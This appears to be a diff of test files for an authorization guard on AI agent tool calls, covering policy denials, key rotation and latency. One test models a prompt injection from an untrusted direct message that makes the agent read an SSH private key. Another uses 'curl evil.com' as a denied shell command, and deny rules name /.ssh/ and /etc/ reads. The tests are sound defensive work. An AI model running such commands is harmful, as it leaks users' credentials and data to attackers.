predicate-claw 0.1.0

package/tests/hack-vs-fix-demo.test.ts

@@ -0,0 +1,44 @@
+import { describe, expect, it } from "vitest";
+import { ToolAdapter } from "../src/adapter.js";
+import { ActionDeniedError, GuardedProvider } from "../src/provider.js";
+
+describe("Hack vs Fix demo scenario", () => {
+  it("shows unguarded exfil path and guarded deny path", async () => {
+    const injectedArgs = { path: "/Users/demo/.ssh/id_rsa" };
+    const injectedContext = { source: "untrusted_dm" };
+
+    const unguardedRead = async (args: Record<string, unknown>) => {
+      return `SECRET:${String(args.path)}`;
+    };
+
+    const hacked = await unguardedRead(injectedArgs);
+    expect(hacked).toContain("SECRET:/Users/demo/.ssh/id_rsa");
+
+    const guardedProvider = new GuardedProvider({
+      principal: "agent:openclaw-local",
+      authorityClient: {
+        authorize: async (request) => {
+          const resource = String(request.resource ?? "");
+          const labels = Array.isArray(request.labels) ? request.labels : [];
+          const isUntrusted = labels.includes("source:untrusted_dm");
+          const isSensitiveRead =
+            request.action === "fs.read" &&
+            (resource.includes("/.ssh/") || resource.startsWith("/etc/"));
+          if (isUntrusted && isSensitiveRead) {
+            return { allow: false, reason: "deny_sensitive_read_from_untrusted_context" };
+          }
+          return { allow: true, reason: "allowed", mandateId: "mnd_ok" };
+        },
+      },
+    });
+    const adapter = new ToolAdapter(guardedProvider);
+
+    await expect(
+      adapter.readFile({
+        args: injectedArgs,
+        context: injectedContext,
+        execute: unguardedRead,
+      }),
+    ).rejects.toBeInstanceOf(ActionDeniedError);
+  });
+});

package/tests/jwks-rotation.test.ts

@@ -0,0 +1,274 @@
+import { describe, expect, it, vi } from "vitest";
+import type { AuthorizationRequest } from "@predicatesystems/authority";
+import { GuardedProvider } from "../src/provider.js";
+
+/**
+ * Integration tests for JWKS/key-rotation-driven policy contexts.
+ *
+ * These tests verify that the provider correctly handles scenarios where
+ * policy decisions depend on JWT validation contexts that may change
+ * during key rotation events.
+ *
+ * Note: The provider passes context fields to the sidecar, which handles
+ * actual JWKS validation. These tests verify context propagation and
+ * decision handling, not the JWKS validation itself.
+ */
+describe("JWKS and key rotation contexts", () => {
+  it("passes authorization request to sidecar for validation", async () => {
+    const capturedRequests: AuthorizationRequest[] = [];
+
+    const mockClient = {
+      authorize: vi.fn().mockImplementation((req: AuthorizationRequest) => {
+        capturedRequests.push(req);
+        return Promise.resolve({ allow: true });
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:jwks-test",
+      authorityClient: mockClient,
+    });
+
+    await provider.authorize({
+      action: "shell.execute",
+      resource: "npm install",
+      args: { cmd: "npm install" },
+      context: {
+        kid: "key-2024-02-20",
+        iss: "https://auth.example.com",
+        tenant_id: "tenant-a",
+        source: "trusted_ui",
+      },
+    });
+
+    expect(capturedRequests).toHaveLength(1);
+    expect(capturedRequests[0].principal).toBe("agent:jwks-test");
+    expect(capturedRequests[0].action).toBe("shell.execute");
+    expect(capturedRequests[0].labels).toContain("source:trusted_ui");
+  });
+
+  it("handles allow decisions from sidecar during key rotation", async () => {
+    // Sidecar accepts requests during rotation window
+    const mockClient = {
+      authorize: vi.fn().mockResolvedValue({
+        allow: true,
+        reason: "valid_key",
+        mandateId: "mandate-rotation-1",
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:rotation-test",
+      authorityClient: mockClient,
+    });
+
+    // Both old and new key contexts should be accepted by sidecar
+    const result1 = await provider.authorize({
+      action: "fs.read",
+      resource: "/config.json",
+      args: { path: "/config.json" },
+      context: { kid: "key-v1", source: "trusted_ui" },
+    });
+
+    const result2 = await provider.authorize({
+      action: "fs.read",
+      resource: "/settings.json",
+      args: { path: "/settings.json" },
+      context: { kid: "key-v2", source: "trusted_ui" },
+    });
+
+    expect(result1).toBe("mandate-rotation-1");
+    expect(result2).toBe("mandate-rotation-1");
+    expect(mockClient.authorize).toHaveBeenCalledTimes(2);
+  });
+
+  it("handles deny decisions from sidecar for revoked keys", async () => {
+    let callCount = 0;
+
+    // Sidecar rejects old key, accepts new key
+    const mockClient = {
+      authorize: vi.fn().mockImplementation(async () => {
+        callCount++;
+        if (callCount === 1) {
+          // First call with old key - rejected
+          return { allow: false, reason: "key_revoked" };
+        }
+        // Second call with new key - accepted
+        return { allow: true, reason: "valid_key" };
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:post-rotation-test",
+      authorityClient: mockClient,
+    });
+
+    // Request with revoked old key
+    await expect(
+      provider.authorize({
+        action: "shell.execute",
+        resource: "echo hello",
+        args: { cmd: "echo hello" },
+        context: { kid: "key-v1", source: "trusted_ui" },
+      }),
+    ).rejects.toThrow("key_revoked");
+
+    // Request with valid new key
+    const result = await provider.authorize({
+      action: "shell.execute",
+      resource: "echo hello",
+      args: { cmd: "echo hello" },
+      context: { kid: "key-v2", source: "trusted_ui" },
+    });
+
+    expect(result).toBeNull(); // No mandate ID in this mock response
+  });
+
+  it("propagates issuer context for IdP validation", async () => {
+    const capturedRequests: AuthorizationRequest[] = [];
+
+    const mockClient = {
+      authorize: vi.fn().mockImplementation((req: AuthorizationRequest) => {
+        capturedRequests.push(req);
+        return Promise.resolve({ allow: true });
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:idp-test",
+      authorityClient: mockClient,
+    });
+
+    await provider.authorize({
+      action: "net.http",
+      resource: "https://api.internal.com/data",
+      args: { url: "https://api.internal.com/data" },
+      context: {
+        iss: "https://login.microsoftonline.com/tenant-id/v2.0",
+        aud: "api://predicate-authority",
+        sub: "user@example.com",
+        tenant_id: "tenant-azure",
+        source: "azure_entra",
+      },
+    });
+
+    expect(capturedRequests).toHaveLength(1);
+    expect(capturedRequests[0].labels).toContain("source:azure_entra");
+  });
+
+  it("handles expired token rejection from sidecar", async () => {
+    const mockClient = {
+      authorize: vi.fn().mockResolvedValue({
+        allow: false,
+        reason: "token_expired",
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:expired-test",
+      authorityClient: mockClient,
+    });
+
+    await expect(
+      provider.authorize({
+        action: "fs.write",
+        resource: "/data.json",
+        args: { path: "/data.json", content: "{}" },
+        context: {
+          exp: Math.floor(Date.now() / 1000) - 3600,
+          iat: Math.floor(Date.now() / 1000) - 7200,
+          source: "trusted_ui",
+        },
+      }),
+    ).rejects.toThrow("token_expired");
+  });
+
+  it("handles multiple concurrent requests with sidecar", async () => {
+    let concurrentCalls = 0;
+    let maxConcurrent = 0;
+
+    const mockClient = {
+      authorize: vi.fn().mockImplementation(async () => {
+        concurrentCalls++;
+        maxConcurrent = Math.max(maxConcurrent, concurrentCalls);
+        // Small delay to allow concurrency
+        await new Promise((r) => setTimeout(r, 5));
+        concurrentCalls--;
+        return { allow: true };
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:multi-key-test",
+      authorityClient: mockClient,
+    });
+
+    await Promise.all([
+      provider.authorize({
+        action: "fs.read",
+        resource: "/a.txt",
+        args: { path: "/a.txt" },
+        context: { session_id: "session-a", source: "trusted_ui" },
+      }),
+      provider.authorize({
+        action: "fs.read",
+        resource: "/b.txt",
+        args: { path: "/b.txt" },
+        context: { session_id: "session-b", source: "trusted_ui" },
+      }),
+      provider.authorize({
+        action: "fs.read",
+        resource: "/c.txt",
+        args: { path: "/c.txt" },
+        context: { session_id: "session-a", source: "trusted_ui" },
+      }),
+    ]);
+
+    expect(mockClient.authorize).toHaveBeenCalledTimes(3);
+    // Should have had some concurrent calls
+    expect(maxConcurrent).toBeGreaterThan(1);
+  });
+
+  it("includes source label for policy evaluation by key trust level", async () => {
+    const capturedRequests: AuthorizationRequest[] = [];
+
+    const mockClient = {
+      authorize: vi.fn().mockImplementation((req: AuthorizationRequest) => {
+        capturedRequests.push(req);
+        const labels = req.labels ?? [];
+        // Sidecar policy: only allow trusted sources
+        if (labels.includes("source:untrusted_dm")) {
+          return Promise.resolve({ allow: false, reason: "untrusted_source" });
+        }
+        return Promise.resolve({ allow: true });
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:trust-test",
+      authorityClient: mockClient,
+    });
+
+    // Trusted source - allowed
+    await provider.authorize({
+      action: "shell.execute",
+      resource: "npm install",
+      args: { cmd: "npm install" },
+      context: { source: "trusted_ui" },
+    });
+
+    // Untrusted source - denied
+    await expect(
+      provider.authorize({
+        action: "shell.execute",
+        resource: "curl evil.com",
+        args: { cmd: "curl evil.com" },
+        context: { source: "untrusted_dm" },
+      }),
+    ).rejects.toThrow("untrusted_source");
+
+    expect(capturedRequests).toHaveLength(2);
+    expect(capturedRequests[0].labels).toContain("source:trusted_ui");
+    expect(capturedRequests[1].labels).toContain("source:untrusted_dm");
+  });
+});

package/tests/load-latency.test.ts

@@ -0,0 +1,214 @@
+import { describe, expect, it, vi } from "vitest";
+import { GuardedProvider } from "../src/provider.js";
+
+/**
+ * Load and latency tests for high-frequency tool invocation paths.
+ *
+ * These tests verify that the provider can handle burst traffic while
+ * maintaining acceptable latency characteristics.
+ */
+describe("load and latency", () => {
+  it("handles burst of 100 sequential authorizations under 500ms total", async () => {
+    const mockClient = {
+      authorize: vi.fn().mockResolvedValue({ allow: true, mandateId: "m1" }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:load-test",
+      authorityClient: mockClient,
+    });
+
+    const iterations = 100;
+    const start = performance.now();
+
+    for (let i = 0; i < iterations; i++) {
+      await provider.authorize({
+        action: "fs.read",
+        resource: `/workspace/file-${i}.txt`,
+        args: { path: `/workspace/file-${i}.txt` },
+      });
+    }
+
+    const elapsed = performance.now() - start;
+
+    expect(mockClient.authorize).toHaveBeenCalledTimes(iterations);
+    // 100 calls should complete well under 500ms with mocked client
+    expect(elapsed).toBeLessThan(500);
+  });
+
+  it("handles 50 concurrent authorizations", async () => {
+    const mockClient = {
+      authorize: vi.fn().mockImplementation(async () => {
+        // Simulate small network delay
+        await new Promise((r) => setTimeout(r, 1));
+        return { allow: true, mandateId: "m1" };
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:concurrent-test",
+      authorityClient: mockClient,
+    });
+
+    const concurrency = 50;
+    const start = performance.now();
+
+    const promises = Array.from({ length: concurrency }, (_, i) =>
+      provider.authorize({
+        action: "shell.execute",
+        resource: `echo test-${i}`,
+        args: { cmd: `echo test-${i}` },
+      }),
+    );
+
+    const results = await Promise.all(promises);
+    const elapsed = performance.now() - start;
+
+    expect(results).toHaveLength(concurrency);
+    expect(mockClient.authorize).toHaveBeenCalledTimes(concurrency);
+    // Concurrent calls should complete faster than sequential
+    expect(elapsed).toBeLessThan(200);
+  });
+
+  it("maintains intent_hash computation performance", () => {
+    const iterations = 1000;
+    const start = performance.now();
+
+    for (let i = 0; i < iterations; i++) {
+      GuardedProvider.intentHash({
+        cmd: `echo "iteration ${i}"`,
+        workdir: "/workspace",
+        env: { NODE_ENV: "test", ITERATION: String(i) },
+      });
+    }
+
+    const elapsed = performance.now() - start;
+
+    // 1000 hash computations should complete under 100ms
+    expect(elapsed).toBeLessThan(100);
+  });
+
+  it("measures p50/p95 latency for authorization calls", async () => {
+    const latencies: number[] = [];
+
+    const mockClient = {
+      authorize: vi.fn().mockImplementation(async () => {
+        // Simulate variable latency (1-5ms)
+        const delay = 1 + Math.random() * 4;
+        await new Promise((r) => setTimeout(r, delay));
+        return { allow: true };
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:latency-test",
+      authorityClient: mockClient,
+    });
+
+    const iterations = 50;
+
+    for (let i = 0; i < iterations; i++) {
+      const start = performance.now();
+      await provider.authorize({
+        action: "net.http",
+        resource: "https://api.example.com",
+        args: { url: "https://api.example.com" },
+      });
+      latencies.push(performance.now() - start);
+    }
+
+    latencies.sort((a, b) => a - b);
+
+    const p50 = latencies[Math.floor(iterations * 0.5)];
+    const p95 = latencies[Math.floor(iterations * 0.95)];
+
+    // Verify latency targets from design doc (with mocked overhead)
+    // Design targets: p50 < 25ms, p95 < 75ms
+    // With mocked 1-5ms delay, we expect p50 < 15ms, p95 < 20ms
+    expect(p50).toBeLessThan(25);
+    expect(p95).toBeLessThan(75);
+  });
+
+  it("handles mixed allow/deny outcomes under load", async () => {
+    let callCount = 0;
+
+    const mockClient = {
+      authorize: vi.fn().mockImplementation(async () => {
+        callCount++;
+        // Alternate between allow and deny
+        if (callCount % 3 === 0) {
+          return { allow: false, reason: "rate_limited" };
+        }
+        return { allow: true, mandateId: `m${callCount}` };
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:mixed-test",
+      authorityClient: mockClient,
+    });
+
+    const iterations = 30;
+    const results = { allowed: 0, denied: 0 };
+
+    for (let i = 0; i < iterations; i++) {
+      try {
+        await provider.authorize({
+          action: "fs.write",
+          resource: `/workspace/file-${i}.txt`,
+          args: { path: `/workspace/file-${i}.txt`, content: "data" },
+        });
+        results.allowed++;
+      } catch {
+        results.denied++;
+      }
+    }
+
+    expect(results.allowed).toBe(20); // 2/3 allowed
+    expect(results.denied).toBe(10); // 1/3 denied
+    expect(mockClient.authorize).toHaveBeenCalledTimes(iterations);
+  });
+
+  it("telemetry emission does not block authorization path", async () => {
+    const telemetryDelays: number[] = [];
+
+    const mockClient = {
+      authorize: vi.fn().mockResolvedValue({ allow: true }),
+    };
+
+    const slowTelemetry = {
+      onDecision: vi.fn().mockImplementation(() => {
+        // Simulate slow telemetry (should not block auth)
+        const start = performance.now();
+        while (performance.now() - start < 1) {
+          // Busy wait 1ms
+        }
+        telemetryDelays.push(performance.now() - start);
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:telemetry-test",
+      authorityClient: mockClient,
+      telemetry: slowTelemetry,
+    });
+
+    const iterations = 10;
+    const start = performance.now();
+
+    for (let i = 0; i < iterations; i++) {
+      await provider.authorize({
+        action: "fs.read",
+        resource: `/file-${i}.txt`,
+        args: { path: `/file-${i}.txt` },
+      });
+    }
+
+    const elapsed = performance.now() - start;
+
+    // Even with slow telemetry, auth should complete reasonably fast
+    // Telemetry runs synchronously here, but in production would be async
+    expect(elapsed).toBeLessThan(100);
+    expect(slowTelemetry.onDecision).toHaveBeenCalledTimes(iterations);
+  });
+});